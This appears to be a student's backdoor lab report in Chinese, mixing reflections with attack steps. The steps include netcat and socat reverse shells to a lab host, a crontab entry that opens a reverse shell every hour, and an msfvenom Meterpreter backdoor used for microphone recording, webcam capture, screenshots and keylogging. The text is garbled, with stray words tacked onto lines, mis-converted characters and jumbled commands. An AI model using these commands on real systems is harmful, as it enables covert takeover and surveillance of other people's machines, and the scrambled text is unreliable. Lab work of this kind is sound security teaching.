後門(木馬)linux
答:上學期信息安全技術作過一個實驗:經過"掛馬"網站主頁中的 < iframe > 代碼連接一個網址(即一個網頁木馬),在用戶訪問此網站時,使用戶主機自動訪問網頁木馬。網頁木馬在獲得用戶鏈接後,自動發送安裝程序給用戶。若是用戶主機存在MS06014漏洞,則自動下載木馬安裝程序並在後臺運行。還有多是別人u盤攜帶了木馬,不當心插到本身電腦上就涼涼了。web
答:在以前實驗中,後門是能夠把本身的名字改爲相似於xindows自身可執行文件的,這樣windows就沒法發現有木馬,而後木馬會自動鏈接服務器啓動。還有一種是相似於釣魚網站同樣,你覺得點的是普通的頁面,實際上是假裝後的後門。shell
答:監控攝像頭讓我感受很可怕,由於以前看到過不少家庭攝像頭被控制的案例,沒想到本身也能監控別人的攝像頭(雖然比較低級),但這個真的讓我更加提升了安全意識。windows
答:上學期上婁老師的課時學了pid,當時搜到一種方法:經過netstat -anltp命令可查看到當前鏈接信息及創建鏈接的進程pid,kill掉可疑鏈接的進程,且已知進程pid能夠執行ls -al /proc/pid值,經過exe對應位置找到後門文件路徑。安全
ipconfig
查看本機的IP地址ncat.exe -l -p 5205
監聽本機5205端口nc 172.30.7.113 5205 -e /bin/sh
(使用nc指令的-e選項反向鏈接Windows主機的5205端口)這兩步和上面的同樣,只不過把地址改爲了kali的,並且是win反向鏈接kali服務器
kali得到win的shell:tcp
ncat.exe -l 5205
監聽端口nc 172.30.7.113
鏈接到端口
ncat.exe -l -p 5205
監聽本機5205端口crontab
的幫助文檔,知道crontab
指令能夠用於設置週期性被執行的指令。crontab -e
指令編輯一條定時任務45 * * * * /bin/netcat 172.30.7.113 5205 -e /bin/sh
,在每一個小時的第45分鐘反向鏈接Windows主機的5205端口lslsls
。在Windows系統下,打開控制面板->管理工具->任務計劃程序,建立任務,填寫任務名稱後,新建一個觸發器工具
tcp-listen:5215 exec:cmd.exe,pty,stderr
,這個命令的做用是把cmd.exe綁定到端口5205,同時把cmd.exe的stderr重定向到stdout上:在kali下輸入socat - tcp:172.30.7.113:5205
即可得到win的shell:網站
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.30.1.114 LPORT=5205 -f exe > 20155205_backdoor.exe
生成後門程序:msfconsole
指令進入msf控制檯,使用監聽模塊,設置payload,設置ip地址和端口record_mic
指令能夠截獲一段音頻:webcam_snap
指令可使用攝像頭進行拍照:webcam stream
指令可使用攝像頭進行錄像:screenshot
指令能夠進行截屏:keyscan_start
指令開始記錄下擊鍵的過程,使用keyscan_dump
指令讀取擊鍵的記錄:答:首先我知道了,NAT(本身的虛擬機聯)和橋接(本身與別人聯,必須得在一個網)的不一樣,這回終於能把虛擬機ping通了。在進行各類監聽的過程當中,個人安全防範意識逐步加強,並且我知道了別人是怎麼攻擊個人,以後我就知道如何來防範不良分子。此次的實驗頗有趣,收穫很大😄3d